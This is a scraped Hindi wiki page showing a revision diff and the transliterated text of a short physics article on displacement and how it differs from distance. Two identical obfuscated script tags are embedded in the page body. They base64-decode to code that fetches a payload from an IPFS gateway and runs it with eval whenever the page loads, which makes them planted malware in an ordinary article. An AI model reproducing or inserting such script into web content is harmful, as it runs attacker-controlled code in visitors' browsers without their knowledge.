Difference between revisions of "विस्थापन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "{{लेख प्रगति |आधार= |प्रारम्भि�)
 
Line 1: Line 1:
 
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Displacement) किसी विशेष दिशा में गतिशील वस्तु की स्थिति परिवर्तन को उसका विस्थापन कहते हैं। विस्थापन एक [[सदिश राशि]] है। ज्ञातव्य है कि [[दूरी]] व विस्थापन में मुख्य अन्तर यह है कि वस्तु का विस्थापन धनात्मक, ऋणात्मक व शून्य भी हो सकता है, परन्तु दूरी सदैव धनात्मक होती है। जैसे हम किसी पत्थर को पृथ्वी से पाँच मीटर की ऊँचाई तक फेंकते हैं तथा पत्थर पुनः अपने स्थान पर वापस लौट आता है। इस दशा में पत्थर का विस्थापन तो शून्य होगा, परन्तु उसके द्वारा चली दूरी दस मीटर होगी।
 
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Displacement) किसी विशेष दिशा में गतिशील वस्तु की स्थिति परिवर्तन को उसका विस्थापन कहते हैं। विस्थापन एक [[सदिश राशि]] है। ज्ञातव्य है कि [[दूरी]] व विस्थापन में मुख्य अन्तर यह है कि वस्तु का विस्थापन धनात्मक, ऋणात्मक व शून्य भी हो सकता है, परन्तु दूरी सदैव धनात्मक होती है। जैसे हम किसी पत्थर को पृथ्वी से पाँच मीटर की ऊँचाई तक फेंकते हैं तथा पत्थर पुनः अपने स्थान पर वापस लौट आता है। इस दशा में पत्थर का विस्थापन तो शून्य होगा, परन्तु उसके द्वारा चली दूरी दस मीटर होगी।
  
{{लेख प्रगति
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भौतिक विज्ञान}}
 
{{भौतिक विज्ञान}}
 
[[Category:भौतिक विज्ञान]][[Category:विज्ञान कोश]]
 
[[Category:भौतिक विज्ञान]][[Category:विज्ञान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:29, 27 July 2012

(aangrezi:Displacement) kisi vishesh disha mean gatishil vastu ki sthiti parivartan ko usaka visthapan kahate haian. visthapan ek sadish rashi hai. jnatavy hai ki doori v visthapan mean mukhy antar yah hai ki vastu ka visthapan dhanatmak, rrinatmak v shoony bhi ho sakata hai, parantu doori sadaiv dhanatmak hoti hai. jaise ham kisi patthar ko prithvi se paanch mitar ki ooanchaee tak pheankate haian tatha patthar punah apane sthan par vapas laut ata hai. is dasha mean patthar ka visthapan to shoony hoga, parantu usake dvara chali doori das mitar hogi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>